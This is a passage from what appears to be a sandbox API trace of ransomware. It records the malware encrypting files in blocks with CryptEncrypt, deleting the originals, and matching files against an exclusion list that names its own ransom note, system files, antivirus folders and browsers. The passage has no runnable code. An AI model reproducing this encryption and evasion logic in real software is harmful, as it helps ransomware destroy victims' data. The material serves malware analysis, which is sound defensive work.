lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.699] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.699] GetLastError () returned 0x0 [0152.699] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.699] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.699] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.699] GetLastError () returned 0x0 [0152.699] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.699] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.699] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0152.699] GetLastError () returned 0x0 [0152.699] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0152.699] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0152.699] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0152.700] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui")) returned 0x20 [0152.700] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui", dwFileAttributes=0x20) returned 0 [0152.700] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned 1 [0152.700] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui")) returned 0 [0152.700] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" [0152.700] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0152.700] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC787.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc787.tmp")) returned 0xc787 [0152.701] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC787.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc787.tmp"), dwFlags=0x1) returned 0 [0152.701] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC787.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc787.tmp")) returned 1 [0152.702] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0152.702] wcslen (_String="OK") returned 0x2 [0152.702] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0152.702] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0152.702] CryptDestroyKey (hKey=0x9ad878) returned 1 [0152.702] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0152.702] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0152.702] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*NMCRYPT") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*.exe") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*.dll") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*.lnk") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*.bat") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*.ini") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*.msi") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*.scf") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*AppData*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\java\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\windows\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*Atheros*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*Realtek*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*bootmgr*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*boot*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*boot*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*IO.SYS*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0152.702] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0152.703] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*ntldr*") returned 0 [0152.703] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*chrome*") returned 0 [0152.703] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*opera*") returned 0 [0152.703] PathMatchSpecW (pszFile="mshwLatin.dll.mui", pszSpec="*firefox*") returned 0 [0152.703] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui", pszSpec="*") returned 1 [0152.703] strlen (_Str="NMoreira") returned 0x8 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.703] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.704] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.848] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.849] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] 